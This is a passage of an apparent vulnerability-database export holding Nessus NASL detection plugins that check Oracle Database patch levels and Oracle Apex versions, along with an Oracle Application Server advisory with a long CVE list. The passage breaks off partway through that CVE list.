5.x\");\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56064);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\n \"CVE-2009-0972\",\n \"CVE-2009-0973\",\n \"CVE-2009-0975\",\n \"CVE-2009-0976\",\n \"CVE-2009-0977\",\n \"CVE-2009-0978\",\n \"CVE-2009-0979\",\n \"CVE-2009-0980\",\n \"CVE-2009-0981\",\n \"CVE-2009-0984\",\n \"CVE-2009-0985\",\n \"CVE-2009-0986\",\n \"CVE-2009-0988\",\n \"CVE-2009-0991\",\n \"CVE-2009-0992\",\n \"CVE-2009-0997\"\n );\n script_bugtraq_id(34461);\n\n script_name(english:\"Oracle Database Multiple Vulnerabilities (April 2009 CPU)\");\n script_summary(english:\"Checks installed patch info\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle database server is missing the April 2009 Critical\nPatch Update (CPU) and therefore is potentially affected by security\nissues in the following components :\n\n - Advanced Queuing\n\n - Application Express\n\n - Cluster Ready Services\n\n - Core RDBMS\n\n - Database Vault\n\n - Listener\n\n - Password Policy\n\n - Resource Manager\n\n - SQLX Functions\n\n - Workspace Manager\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a3c49435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2009 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:database_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_rdbms_query_patch_info.nbin\", \"oracle_rdbms_patch_info.nbin\");\n\n 
exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"misc_func.inc\");\n\n################################################################################\n# APR2009\npatches = make_nested_array();\n\n# RDBMS 11.1.0.7\npatches[\"11.1.0.7\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"11.1.0.7.0.1\", \"CPU\", \"8290478\");\npatches[\"11.1.0.7\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"11.1.0.7.1\", \"CPU\", \"8343061\");\npatches[\"11.1.0.7\"][\"db\"][\"win64\"] = make_array(\"patch_level\", \"11.1.0.7.1\", \"CPU\", \"8343070\");\n# RDBMS 11.1.0.6\npatches[\"11.1.0.6\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"11.1.0.6.6\", \"CPU\", \"8290402\");\npatches[\"11.1.0.6\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"11.1.0.6.9\", \"CPU\", \"8333655\");\npatches[\"11.1.0.6\"][\"db\"][\"win64\"] = make_array(\"patch_level\", \"11.1.0.6.9\", \"CPU\", \"8333657\");\n# RDBMS 10.1.0.5\npatches[\"10.1.0.5\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"10.1.0.5.14\", \"CPU\", \"8290534\");\npatches[\"10.1.0.5\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"10.1.0.5.32\", \"CPU\", \"8300356\");\n# RDBMS 10.2.0.4\npatches[\"10.2.0.4\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"10.2.0.4.0.4\", \"CPU\", \"8290506\");\npatches[\"10.2.0.4\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"10.2.0.4.18\", \"CPU\", \"8307237\");\npatches[\"10.2.0.4\"][\"db\"][\"win64\"] = make_array(\"patch_level\", \"10.2.0.4.18\", \"CPU\", \"8307238\");\n\ncheck_oracle_database(patches:patches, high_risk:TRUE);\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-17T02:50:36", "bulletinFamily": "scanner", "description": "Unprivileged database users can see Oracle Apex password hashes in FLOWS_030000.WWV_FLOW_USER.", "modified": "2018-11-15T00:00:00", "published": "2013-02-20T00:00:00", "id": 
"ORACLE_APEX_CVE-2009-0981.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64708", "title": "Oracle Application Express (Apex) CVE-2009-0981", "type": "nessus", "sourceData": "# ---------------------------------------------------------------------------------\n# (c) Recx Ltd 2009-2012\n# http://www.recx.co.uk/\n#\n# Detection script for multiple issues within Oracle Application Express\n#\n# 3.0\n# https://www.oracle.com/technetwork/topics/security/cpuapr2009-099563.html\n# http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=786800.1\n# http://www.red-database-security.com/advisory/apex_password_hashes.html\n# Unspecified vulnerability in the Application Express component in Oracle Database 11.1.0.7 allows remote authenticated users to affect confidentiality, related to APEX\n# CVE-2009-0981\n#\n# Version 1.0\n# ---------------------------------------------------------------------------------\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64708);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2009-0981\");\n script_bugtraq_id(34461);\n\n script_name(english:\"Oracle Application Express (Apex) CVE-2009-0981\");\n script_summary(english:\"Checks Apex version against CVE-2009-0981\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is running a vulnerable version of Oracle Apex.\");\n script_set_attribute(attribute:\"description\", value:\n\"Unprivileged database users can see Oracle Apex password hashes in FLOWS_030000.WWV_FLOW_USER.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade Application Express to at least version 4.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.oracle.com/technetwork/developer-tools/apex/index.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/topics/security/cpuapr2009-099563.html\");\n # http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=786800.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7fa76004\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.red-database-security.com/advisory/apex_password_hashes.html\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:oracle:application_express\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Recx Ltd.\");\n\n script_dependencies(\"oracle_apex_detect_version.nasl\");\n script_require_keys(\"Oracle/Apex\");\n script_require_ports(\"Services/www\", 8080, 80, 443);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nfunction raise_finding(port, report)\n{\n if(report_verbosity > 0)\n security_warning(port:port, extra:report);\n else security_warning(port);\n}\n\nport = get_http_port(default:8080);\n\nif (!get_port_state(port)) exit(0, \"Port \" + port + \" is not open.\");\n\nversion = get_kb_item(\"Oracle/Apex/\"+port+\"/Version\");\nif(!version) exit(0, \"The 'Oracle/Apex/\" + port + \"/Version' KB item is not set.\");\n\nlocation = get_kb_item(\"Oracle/Apex/\" + port 
+ \"/Location\");\nif(!location) exit(0, \"The 'Oracle/Apex/\" + port + \"/Location' KB item is not set.\");\nurl = build_url(qs:location, port:port);\n\nif (version == \"3.2.1\")\n{\n report = '\\n URL : ' + url +\n\t '\\n Installed version : ' + version +\n\t '\\n Fixed version : 4.0' + '\\n';\n raise_finding(port:port, report:report);\n exit(0);\n}\n\nexit(0, \"The Oracle Apex install at \" + url + \" is version \" + version + \" and is not affected.\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:13:01", "bulletinFamily": "scanner", "description": "The remote host is running Oracle Application Server. It was not possible\nto determine its version, so the version of Oracle Application Server\ninstalled on the remote host could potentially be affected by multiple\nvulnerabilities :\n\n - CVE-2000-0169: Remote command execution in the web\n listener component.\n\n - CVE-2000-1235: Information disclosure in the port\n listener component and modplsql.\n\n - CVE-2000-1236: SQL injection in mod_sql.\n\n - CVE-2001-0326: Information disclosure in the Java\n Virtual Machine.\n\n - CVE-2001-0419: Buffer overflow in ndwfn4.so.\n\n - CVE-2001-0591: Directory traversal.\n\n - CVE-2001-1216: Buffer overflow in the PL/SQL Apache module.\n\n - CVE-2001-1217: Directory traversal vulnerability in the\n PL/SQL Apache module.\n\n - CVE-2001-1371: Improper access control in the SOAP\n service.\n\n - CVE-2001-1372: Information disclosure.\n\n - CVE-2002-0386: Denial of service through the\n administration module for Oracle Web Cache.\n\n - CVE-2002-0559: Buffer overflows in the PL/SQL module.\n\n - CVE-2002-0560: Information disclosure in the PL/SQL\n module.\n\n - CVE-2002-0561: Authentication bypass in the PL/SQL\n Gateway web administration interface.\n\n - CVE-2002-0562: Information disclosure through\n globals.jsa.\n\n - CVE-2002-0563: Improper access control on several\n services.\n\n - 
CVE-2002-0564: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2002-0565: Information disclosure through JSP files\n in the _pages directory.\n\n - CVE-2002-0566: Denial of service in the PL/SQL module.\n\n - CVE-2002-0568: Improper access control on XSQLConfig.xml\n and soapConfig.xml.\n\n - CVE-2002-0569: Authentication bypass through\n XSQLServlet.\n\n - CVE-2002-0655: Denial of service in OpenSSL.\n\n - CVE-2002-0656: Buffer overflows in OpenSSL.\n\n - CVE-2002-0659: Denial of service in OpenSSL.\n\n - CVE-2002-0840: Cross-site scripting in the default error\n page of Apache.\n\n - CVE-2002-0842: Format string vulnerability in mod_dav.\n\n - CVE-2002-0843: Buffer overflows in ApacheBench.\n\n - CVE-2002-0947: Buffer overflow in rwcgi60.\n\n - CVE-2002-1089: Information disclosure in rwcgi60.\n\n - CVE-2002-1630: Improper access control on sendmail.jsp.\n\n - CVE-2002-1631: SQL injection in query.xsql.\n\n - CVE-2002-1632: Information disclosure through several\n JSP pages.\n\n - CVE-2002-1635: Information disclosure in Apache.\n\n - CVE-2002-1636: Cross-site scripting in the htp PL/SQL\n package.\n\n - CVE-2002-1637: Default credentials in multiple\n components.\n\n - CVE-2002-1858: Information disclosure through the\n WEB-INF directory.\n\n - CVE-2002-2153: Format string vulnerability in the\n administrative pages of the PL/SQL module.\n\n - CVE-2002-2345: Credential leakage in the web cache\n administrator interface.\n\n - CVE-2002-2347: Cross-site scripting in several JSP\n pages.\n\n - CVE-2004-1362: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2004-1363: Buffer overflow in extproc.\n\n - CVE-2004-1364: Directory traversal in extproc.\n\n - CVE-2004-1365: Command execution in extproc.\n\n - CVE-2004-1366: Improper access control on\n emoms.properties.\n\n - CVE-2004-1367: Credential leakage in Database Server.\n\n - CVE-2004-1368: Arbitrary file execution in ISQL*Plus.\n\n - CVE-2004-1369: Denial of service in TNS Listener.\n\n - 
CVE-2004-1370: Multiple SQL injection vulnerabilities in\n PL/SQL.\n\n - CVE-2004-1371: Stack-based buffer overflow.\n\n - CVE-2004-1707: Privilege escalation in dbsnmp and nmo.\n\n - CVE-2004-1774: Buffer overflow in the MD2 package.\n\n - CVE-2004-1877: Phishing vulnerability in Single Sign-On\n component.\n\n - CVE-2004-2134: Weak cryptography for passwords in the\n toplink mapping workBench.\n\n - CVE-2004-2244: Denial of service in the XML parser.\n\n - CVE-2005-1383: Authentication bypass in HTTP Server.\n\n - CVE-2005-1495: Detection bypass.\n\n - CVE-2005-1496: Privilege escalation in the\n DBMS_Scheduler.\n\n - CVE-2005-2093: Web cache poisoning.\n\n - CVE-2005-3204: Cross-site scripting.\n\n - CVE-2005-3445: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2005-3446: Unspecified vulnerability in Internet\n Directory.\n\n - CVE-2005-3447: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2005-3448: Unspecified vulnerability in the OC4J\n module.\n\n - CVE-2005-3449: Multiple unspecified vulnerabilities in\n multiple components.\n\n - CVE-2005-3450: Unspecified vulnerability in HTTP Server.\n\n - CVE-2005-3451: Unspecified vulnerability in\n SQL*ReportWriter.\n\n - CVE-2005-3452: Unspecified vulnerability in Web Cache.\n\n - CVE-2005-3453: Multiple unspecified vulnerabilities in\n Web Cache.\n\n - CVE-2006-0273: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2006-0274: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0275: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0282: Unspecified vulnerability.\n\n - CVE-2006-0283: Unspecified vulnerability.\n\n - CVE-2006-0284: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0285: Unspecified vulnerability in the Java Net\n component.\n\n - CVE-2006-0286: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0287: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0288: Multiple 
unspecified vulnerabilities in\n the Oracle Reports Developer component.\n\n - CVE-2006-0289: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0290: Unspecified vulnerability in the Oracle\n Workflow Cartridge component.\n\n - CVE-2006-0291: Multiple unspecified vulnerabilities in\n the Oracle Workflow Cartridge component.\n\n - CVE-2006-0435: Unspecified vulnerability in Oracle\n PL/SQL.\n\n - CVE-2006-0552: Unspecified vulnerability in the Net\n Listener component.\n\n - CVE-2006-0586: Multiple SQL injection vulnerabilities.\n\n - CVE-2006-1884: Unspecified vulnerability in the Oracle\n Thesaurus Management System component.\n\n - CVE-2006-3706: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3707: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3708: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3709: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3710: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3711: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3712: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3713: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3714: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5353: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5354: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5355: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5356: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5357: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5358: Unspecified vulnerability in the Oracle\n Forms component.\n\n - CVE-2006-5359: Multiple unspecified vulnerabilities in\n Oracle Reports Developer component.\n\n - CVE-2006-5360: Unspecified vulnerability in Oracle Forms\n component.\n\n - CVE-2006-5361: Unspecified vulnerability 
in Oracle\n Containers for J2EE.\n\n - CVE-2006-5362: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5363: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5364: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5365: Unspecified vulnerability in Oracle\n Forms.\n\n - CVE-2006-5366: Multiple unspecified vulnerabilities.\n\n - CVE-2007-0222: Directory traversal vulnerability in\n EmChartBean.\n\n - CVE-2007-0275: Cross-site scripting vulnerability in\n Oracle Reports Web Cartridge (RWCGI60).\n\n - CVE-2007-0280: Buffer overflow in Oracle Notification\n Service.\n\n - CVE-2007-0281: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2007-0282: Unspecified vulnerability in OPMN02.\n\n - CVE-2007-0283: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0284: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-0285: Unspecified vulnerability in Oracle\n Reports Developer.\n\n - CVE-2007-0286: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0287: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0288: Unspecified vulnerability in Oracle\n Internet Directory.\n\n - CVE-2007-0289: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-1359: Improper access control in mod_security.\n\n - CVE-2007-1609: Cross-site scripting vulnerability in\n servlet/Spy in Dynamic Monitoring Services (DMS).\n\n - CVE-2007-2119: Cross-site scripting vulnerability in the\n Administration Front End for Oracle Enterprise (Ultra)\n Search.\n\n - CVE-2007-2120: Denial of service in the Oracle\n Discoverer servlet.\n\n - CVE-2007-2121: Unspecified vulnerability in the COREid\n Access component.\n\n - CVE-2007-2122: Unspecified vulnerability in the Wireless\n component.\n\n - CVE-2007-2123: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2124: Unspecified vulnerability 
in the Portal\n component.\n\n - CVE-2007-2130: Unspecified vulnerability in Workflow\n Cartridge.\n\n - CVE-2007-3553: Cross-site scripting vulnerability in\n Rapid Install Web Server.\n\n - CVE-2007-3854: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and the Spatial\n component.\n\n - CVE-2007-3859: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-3861: Unspecified vulnerability in Oracle\n Jdeveloper.\n\n - CVE-2007-3862: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-3863: Unspecified vulnerability in Oracle\n JDeveloper.\n\n - CVE-2007-5516: Unspecified vulnerability in the Oracle\n Process Mgmt & Notification component.\n\n - CVE-2007-5517: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5518: Unspecified vulnerability in HTTP Server.\n\n - CVE-2007-5519: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5520: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5521: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-5522: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5523: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5524: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5525: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5526: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5531: Unspecified vulnerability in Oracle Help\n for Web.\n\n - CVE-2008-0340: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and Spatial component.\n\n - CVE-2008-0343: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0344: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0345: Unspecified vulnerability in the Core\n RDBMS component.\n\n - CVE-2008-0346: Unspecified vulnerability in the Oracle\n 
Jinitiator component.\n\n - CVE-2008-0347: Unspecified vulnerability in the Oracle\n Ultra Search component.\n\n - CVE-2008-0348: Multiple unspecified vulnerabilities in\n the PeopleTools component.\n\n - CVE-2008-0349: Unspecified vulnerability in the\n PeopleTools component.\n\n - CVE-2008-1812: Unspecified vulnerability in the Oracle\n Enterprise Manager component.\n\n - CVE-2008-1814: Unspecified vulnerability in the Oracle\n Secure Enterprise Search or Ultrasearch component.\n\n - CVE-2008-1823: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-1824: Unspecified vulnerability in the Oracle\n Dynamic Monitoring Service component.\n\n - CVE-2008-1825: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2583: Unspecified vulnerability in the sample\n Discussion Forum Portlet for the Oracle Portal\n component.\n\n - CVE-2008-2588: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-2589: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2593: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2594: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2595: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2008-2609: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2612: Unspecified vulnerability in the Hyperion\n BI Plus component.\n\n - CVE-2008-2614: Unspecified vulnerability in HTTP Server.\n\n - CVE-2008-2619: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2008-2623: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-3975: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3977: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3986: Unspecified vulnerability in the Oracle\n Discoverer Administrator component.\n\n - CVE-2008-3987: Unspecified 
vulnerability in the Oracle\n Discoverer Desktop component.\n\n - CVE-2008-4014: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2008-4017: Unspecified vulnerability in the OC4J\n component.\n\n - CVE-2008-5438: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-7233: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2009-0217: Signature spoofing vulnerability in\n multiple components.\n\n - CVE-2009-0989: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0990: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0994: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1008: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1009: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1010: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1011: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1017: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1976: Unspecified vulnerability in HTTP Server.\n\n - CVE-2009-1990: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-1999: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-3407: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2009-3412: Unspecified vulnerability in the Unzip\n component.\n\n - CVE-2010-0066: Unspecified vulnerability in the Access\n Manager Identity Server component.\n\n - CVE-2010-0067: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2010-0070: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-0789: Unspecified vulnerability in HTTP Server.\n\n - CVE-2011-0795: Unspecified vulnerability in Single\n Sign-On.\n\n - 
CVE-2011-0884: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2011-2237: Unspecified vulnerability in the Oracle\n Web Services Manager component.\n\n - CVE-2011-2314: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-3523: Unspecified vulnerability in the Oracle\n Web Services Manager component.", "modified": "2018-07-16T00:00:00", "published": "2012-01-24T00:00:00", "id": "ORACLE_APPLICATION_SERVER_PCI.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57619", "title": "Oracle Application Server Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57619);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n\n script_cve_id(\n \"CVE-2000-0169\",\n \"CVE-2000-1235\",\n \"CVE-2000-1236\",\n \"CVE-2001-0326\",\n \"CVE-2001-0419\",\n \"CVE-2001-0591\",\n \"CVE-2001-1216\",\n \"CVE-2001-1217\",\n \"CVE-2001-1371\",\n \"CVE-2001-1372\",\n \"CVE-2002-0386\",\n \"CVE-2002-0559\",\n \"CVE-2002-0560\",\n \"CVE-2002-0561\",\n \"CVE-2002-0562\",\n \"CVE-2002-0563\",\n \"CVE-2002-0564\",\n \"CVE-2002-0565\",\n \"CVE-2002-0566\",\n \"CVE-2002-0568\",\n \"CVE-2002-0569\",\n \"CVE-2002-0655\",\n \"CVE-2002-0656\",\n \"CVE-2002-0659\",\n \"CVE-2002-0840\",\n \"CVE-2002-0842\",\n \"CVE-2002-0843\",\n \"CVE-2002-0947\",\n \"CVE-2002-1089\",\n \"CVE-2002-1630\",\n \"CVE-2002-1631\",\n \"CVE-2002-1632\",\n \"CVE-2002-1635\",\n \"CVE-2002-1636\",\n \"CVE-2002-1637\",\n \"CVE-2002-1858\",\n \"CVE-2002-2153\",\n \"CVE-2002-2345\",\n \"CVE-2002-2347\",\n \"CVE-2004-1362\",\n \"CVE-2004-1363\",\n \"CVE-2004-1364\",\n \"CVE-2004-1365\",\n \"CVE-2004-1366\",\n \"CVE-2004-1367\",\n \"CVE-2004-1368\",\n \"CVE-2004-1369\",\n \"CVE-2004-1370\",\n \"CVE-2004-1371\",\n \"CVE-2004-1707\",\n \"CVE-2004-1774\",\n \"CVE-2004-1877\",\n \"CVE-2004-2134\",\n 
\"CVE-2004-2244\",\n \"CVE-2005-1383\",\n \"CVE-2005-1495\",\n \"CVE-2005-1496\",\n \"CVE-2005-2093\",\n \"CVE-2005-3204\",\n \"CVE-2005-3445\",\n \"CVE-2005-3446\",\n \"CVE-2005-3447\",\n \"CVE-2005-3448\",\n \"CVE-2005-3449\",\n \"CVE-2005-3450\",\n \"CVE-2005-3451\",\n \"CVE-2005-3452\",\n \"CVE-2005-3453\",\n \"CVE-2006-0273\",\n \"CVE-2006-0274\",\n \"CVE-2006-0275\",\n \"CVE-2006-0282\",\n \"CVE-2006-0283\",\n \"CVE-2006-0284\",\n \"CVE-2006-0285\",\n \"CVE-2006-0286\",\n \"CVE-2006-0287\",\n \"CVE-2006-0288\",\n \"CVE-2006-0289\",\n \"CVE-2006-0290\",\n \"CVE-2006-0291\",\n \"CVE-2006-0435\",\n \"CVE-2006-0552\",\n \"CVE-2006-0586\",\n \"CVE-2006-1884\",\n \"CVE-2006-3706\",\n \"CVE-2006-3707\",\n \"CVE-2006-3708\",\n \"CVE-2006-3709\",\n \"CVE-2006-3710\",\n \"CVE-2006-3711\",\n \"CVE-2006-3712\",\n \"CVE-2006-3713\",\n \"CVE-2006-3714\",\n \"CVE-2006-5353\",\n \"CVE-2006-5354\",\n \"CVE-2006-5355\",\n \"CVE-2006-5356\",\n \"CVE-2006-5357\",\n \"CVE-2006-5358\",\n \"CVE-2006-5359\",\n \"CVE-2006-5360\",\n \"CVE-2006-5361\",\n \"CVE-2006-5362\",\n \"CVE-2006-5363\",\n \"CVE-2006-5364\",\n \"CVE-2006-5365\",\n \"CVE-2006-5366\",\n \"CVE-2007-0222\",\n \"CVE-2007-0275\",\n \"CVE-2007-0280\",\n \"CVE-2007-0281\",\n \"CVE-2007-0282\",\n \"CVE-2007-0283\",\n \"CVE-2007-0284\",\n \"CVE-2007-0285\",\n \"CVE-2007-0286\",\n \"CVE-2007-0287\",\n \"CVE-2007-0288\",\n \"CVE-2007-0289\",\n \"CVE-2007-1359\",\n \"CVE-2007-1609\",\n \"CVE-2007-2119\",\n \"CVE-2007-2120\",\n \"CVE-2007-2121\",\n \"CVE-2007-2122\",\n \"CVE-2007-2123\",\n \"CVE-2007-2124\",\n \"CVE-2007-2130\",\n \"CVE-2007-3553\",\n \"CVE-2007-3854\",\n \"CVE-2007-3859\",\n \"CVE-2007-3861\",\n \"CVE-2007-3862\",\n \"CVE-2007-3863\",\n \"CVE-2007-5516\",\n \"CVE-2007-5517\",\n \"CVE-2007-5518\",\n \"CVE-2007-5519\",\n \"CVE-2007-5520\",\n \"CVE-2007-5521\",\n \"CVE-2007-5522\",\n \"CVE-2007-5523\",\n \"CVE-2007-5524\",\n \"CVE-2007-5525\",\n \"CVE-2007-5526\",\n \"CVE-2007-5531\",\n \"CVE-2008-0340\",\n 
